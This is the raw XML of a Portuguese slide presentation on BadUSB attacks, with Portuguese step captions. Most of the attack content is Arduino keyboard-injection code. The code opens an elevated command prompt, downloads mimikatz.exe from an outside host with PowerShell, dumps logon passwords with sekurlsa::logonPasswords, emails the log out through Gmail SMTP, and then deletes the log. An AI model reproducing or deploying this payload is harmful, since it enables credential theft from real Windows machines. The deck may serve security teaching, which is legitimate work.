              <a:t> %TEMP%\\pw.exe");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powershell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(300);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SMTPServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> = 'smtp.gmail.com'");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR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5993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19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typeKey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Net.Mail.SmtpClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>SmtpServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>, 587)");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SMTPInfo.EnableSsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>true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SMTPInfo.Credentials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System.Net.NetworkCredential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>remetente@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>', ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>senha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>');");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System.Net.Mail.MailMessage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ReportEmail.From</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>remetente@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>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ReportEmail.To.Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>destinatário@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>')");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ReportEmail.Subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>Report</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>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ReportEmail.Body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> = 'Reporte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>.'");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ReportEmail.Attachments.Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>('c:\\pwlog.txt')");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SMTPInfo.Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>ReportEmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>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861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92" name="CaixaDeTexto 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9822057-F56D-4186-9531-59F539B25303}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1039398" y="453860"/>
            <a:ext cx="10541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Porta da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" b="1" dirty="0" err="1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Garegem</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4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Rockwell" panose="020606030202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74E59F3F-893C-4BC8-A33A-0CFDAFBADB65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323316" y="1038635"/>
            <a:ext cx="11520341" cy="4890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84E23A6-282A-4438-BAD9-8625413D713A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="795561" y="1126323"/>
            <a:ext cx="10389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/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" i="1" dirty="0"/>
              <a:t>Fonte: Hacker anônimo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402180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 animBg="1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20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del</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> c:\\pwlog.txt");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(700);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Keyboard.end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>}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loop() {}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15300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o Script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F58CBC5-26B0-4EF6-99E9-1F0BD9C2E0EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="2748942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D827F20-7FB2-4C9C-8851-87686E925839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="3814277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D883729-4590-415F-88A4-73BC26689FAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="4240411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AB2B885-6E71-4084-B92D-E2D0412DC0BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="5092679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BB2C45C-0451-4FB0-AD3C-A33FC9C56F1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="2962009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CBB0486-99EA-4DC3-A8A3-C05492385B27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="317507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8DC9380E-A837-4C9D-AB65-FC6519D95843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="338814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CADE2FB6-A855-4AB3-AA1C-BB9186C32F63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="360121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B132976A-468E-44F0-AA44-E21BE8F8591B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="402734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34207E67-41B2-4338-9EF5-B762FD154B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="4453478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C517160-3D5C-4801-B778-20656158D52F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="4666545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6083C4-FBD6-46E2-9FD4-BBCB9EFBEB4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="4879612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B60A6617-6764-4D7C-A5DB-AD67B21A0AAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="530574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4F8115B5-221F-4A12-9CE2-B71E1D410C8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="551881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0C0889C5-E310-45AA-B173-E7B3FFB4938E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="573188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19712A-3605-422B-ACEF-F48484A62B54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="594495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C6AB723D-098B-4ED1-9124-74FE6139DEA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="104440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B78A020-1487-4456-89A3-0FA8FE3A2E39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="1683607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0DBAF401-364A-4DD9-A99A-6B4907361DC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="125747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2D2312AC-ECF3-4240-9532-37800AFE2B1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="147054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A258B623-ACE1-4DA6-B5FA-EB73A868CD2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="189667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F1289CE3-4632-4550-B1A5-3275F6439BD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="2109741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21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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>Keyboard.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>typeKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>){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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>}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setup()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Keyboard.begin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(3000);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(KEY_LEFT_CTRL);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(KEY_ESC);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Keyboard.releaseAll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cmd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(KEY_LEFT_SHIFT) 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(KEY_LEFT_CTRL) ;</a:t>
            </a:r>
          </a:p>
          <a:p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(KEY_LEFT_ALT);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(121);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Keyboard.releaseAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>();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D54F92E-65D5-43CD-9A84-2248D8665DEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401623" y="2644990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 o teclado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E7114C5-8E1B-41B3-81A9-B405CFD3F40E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401623" y="931942"/>
            <a:ext cx="324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Inclui a Biblioteca para o Teclado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1411A19-2C82-4799-8EB6-A8F144A76968}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401623" y="3715645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132237E-32DB-4C55-950C-8A5D257792B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401623" y="4143907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D7B356F-7F64-4DFE-AD06-BD8E24EB2969}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401623" y="5000431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248EE41-C4ED-419E-AA4C-6AA6A328578E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401623" y="2859121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69ACA87-14AA-4952-BEBC-967F801A57B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401623" y="1574335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B45D39E-A13C-4EDA-B3A0-83AFB434A209}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401623" y="1146073"/>
            <a:ext cx="44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 a função para o pressionamento de tecla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24568F5-9F89-4294-9854-3F07704EDD8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401623" y="3073252"/>
            <a:ext cx="452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Pressiona simultaneamente as teclas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Ctrl+ESC</a:t>
            </a:r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E800203-530C-4161-9965-71004CC8ADA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401623" y="3929776"/>
            <a:ext cx="136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Digita “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>”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50615B39-22F1-4797-8E13-C1B10EB097FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401623" y="4358038"/>
            <a:ext cx="537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Pressiona simultaneamente as teclas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Ctrl+SHIFT+ENTER</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="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2E3CD33A-69E2-4830-8196-842739EE521E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401623" y="5214562"/>
            <a:ext cx="321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Envia o código ASCII ALT+121 (Y)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9B3623A-0188-4E08-BB04-F0C93C177395}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401623" y="5642824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Libera as teclas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79847B23-B3AA-480E-A3E1-EB9A103CE45A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401623" y="5856948"/>
            <a:ext cx="16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Pressiona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Enter</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/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3ED3B8D4-87C7-4CCF-86AB-7EDE5D243C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5411293" y="3527563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Libera as teclas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26080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5" grpId="0" animBg="1"/>
      <p:bldP spid="49" grpId="0" animBg="1"/>
      <p:bldP spid="51" grpId="0" animBg="1"/>
      <p:bldP spid="53" grpId="0" animBg="1"/>
      <p:bldP spid="58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2" grpId="0"/>
      <p:bldP spid="46" grpId="0"/>
      <p:bldP spid="48" grpId="0"/>
      <p:bldP spid="50" grpId="0"/>
      <p:bldP spid="52" grpId="0"/>
      <p:bldP spid="54" grpId="0"/>
      <p:bldP spid="59" grpId="0"/>
      <p:bldP spid="61" grpId="0"/>
      <p:bldP spid="63" grpId="0"/>
      <p:bldP spid="70" grpId="0"/>
      <p:bldP spid="76" grpId="0"/>
      <p:bldP spid="78" grpId="0"/>
      <p:bldP spid="84" grpId="0"/>
      <p:bldP spid="88" grpId="0"/>
      <p:bldP spid="90" grpId="0"/>
      <p:bldP spid="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5633266A-2733-47E3-A064-B76D2DE397A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="2748942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760EABD-2AED-4F98-A397-50848AD97E95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="3814277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110BB78-996B-4F11-B8AD-582AE64D3A44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="4240411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49D953A3-8B2D-46CA-97EB-DDD4F29F2F55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="5092679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EAF714F-4110-406B-94CF-BFCC5E4B798F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="2962009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C7E4BAB-9BCC-4E2A-BA01-8F678DACA03B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="317507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10D4F57-A0F3-4BF1-A17A-36358F9C56CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="338814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9433080-5A47-4A1B-8360-DF92454E8B70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="3601210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72C627C-B903-4504-A343-106B075600D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="402734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3E97B46-2F81-4090-ADA7-F9117CF9BE41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="4453478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F95F9D3-7BD0-426F-B7E4-559824BF28A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="4666545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0128735-5F9A-4DB0-8CB7-38C7CB3762AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="4879612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912F769-3790-4564-9139-87D0B3115586}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="530574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375B6A8-7DF1-4064-B037-602AE4328C94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="5518813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13B639A-3B25-4028-9E93-9469B1BFA470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="573188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E6C5694-830F-41AC-B1FE-DCCA72BBD941}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="2535875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5867CFE-3B36-4806-9C22-1AF85E406049}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="1044406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7D2DFDD-8119-4637-8CE4-3D325B5DF865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="1683607"/>
            <a:ext cx="11697179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6B0DB966-8DDC-41EF-A2AF-D86D4328FA3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="125747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040E4F-D7B2-49B2-A7FC-31B10E908474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="147054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E19C5978-F6ED-4CA2-B7A4-640CF8135621}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="189667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8417A32D-B535-40B0-9958-B2B1963C2967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="2109741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A2F88C91-54FA-4BA6-89D0-9708E8B28DFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="2322808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o Script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22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121324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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(300);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powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> (new-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>('http://l2r1.com.br/tools/64/mimikatz.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>','%TEMP%\\pw.exe')");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typeKey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("%TEMP%\\pw.exe &gt; c:\\pwlog.txt &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> pwlog.txt;");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(2000);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privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>::debug");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sekurlsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>logonPasswords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> full");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 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del</a:t>
            </a:r>
            <a:r>
